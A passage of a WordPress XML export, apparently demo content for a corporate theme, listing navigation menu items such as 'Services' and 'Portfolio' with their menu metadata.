		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/1757/</link>
		<pubDate>Mon, 09 Nov 2020 04:44:27 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-corporate/2020/11/09/1757/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1757</wp:post_id>
		<wp:post_date><![CDATA[2020-11-09 04:44:27]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-09 04:44:27]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1757]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>10</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1704]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[471]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/1758/</link>
		<pubDate>Mon, 09 Nov 2020 04:44:27 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-corporate/2020/11/09/1758/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1758</wp:post_id>
		<wp:post_date><![CDATA[2020-11-09 04:44:27]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-09 04:44:27]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1758]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>26</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[768]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/1759/</link>
		<pubDate>Mon, 09 Nov 2020 04:44:27 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-corporate/2020/11/09/1759/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1759</wp:post_id>
		<wp:post_date><![CDATA[2020-11-09 04:44:27]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-09 04:44:27]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1759]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>25</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1766]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[1002]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/1760/</link>
		<pubDate>Mon, 09 Nov 2020 04:44:27 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-corporate/2020/11/09/1760/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1760</wp:post_id>
		<wp:post_date><![CDATA[2020-11-09 04:44:27]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-09 04:44:27]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1760]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>24</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1766]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[999]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/1761/</link>
		<pubDate>Mon, 09 Nov 2020 04:44:27 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-corporate/2020/11/09/1761/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1761</wp:post_id>
		<wp:post_date><![CDATA[2020-11-09 04:44:27]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-09 04:44:27]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1761]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>23</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1766]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[996]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/1762/</link>
		<pubDate>Mon, 09 Nov 2020 04:44:27 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-corporate/2020/11/09/1762/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1762</wp:post_id>
		<wp:post_date><![CDATA[2020-11-09 04:44:27]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-09 04:44:27]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1762]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>22</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1766]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[977]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/1763/</link>
		<pubDate>Mon, 09 Nov 2020 04:44:27 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-corporate/2020/11/09/1763/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1763</wp:post_id>
		<wp:post_date><![CDATA[2020-11-09 04:44:27]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-09 04:44:27]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1763]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>21</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1766]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[959]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/1764/</link>
		<pubDate>Mon, 09 Nov 2020 04:44:27 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-corporate/2020/11/09/1764/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1764</wp:post_id>
		<wp:post_date><![CDATA[2020-11-09 04:44:27]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-09 04:44:27]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1764]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>20</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1766]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[898]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Our Services 2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/our-services-2/</link>
		<pubDate>Mon, 09 Nov 2020 04:44:27 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-corporate/2020/11/09/our-services-2/</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1765</wp:post_id>
		<wp:post_date><![CDATA[2020-11-09 04:44:27]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-09 04:44:27]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[our-services-2]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>5</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1704]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[885]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Services</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/services/</link>
		<pubDate>Mon, 09 Nov 2020 04:44:28 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-corporate/2020/11/09/services/</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1766</wp:post_id>
		<wp:post_date><![CDATA[2020-11-09 04:44:28]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-09 04:44:28]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[services]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>19</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[868]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/1767/</link>
		<pubDate>Mon, 09 Nov 2020 04:44:28 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-corporate/2020/11/09/1767/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1767</wp:post_id>
		<wp:post_date><![CDATA[2020-11-09 04:44:28]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-09 04:44:28]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1767]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>17</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1768]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[861]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Portfolio</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/</link>
		<pubDate>Mon, 09 Nov 2020 04:44:28 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-corporate/2020/11/09/portfolio/</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1768</wp:post_id>
		<wp:post_date><![CDATA[2020-11-09 04:44:28]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-09 04:44:28]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
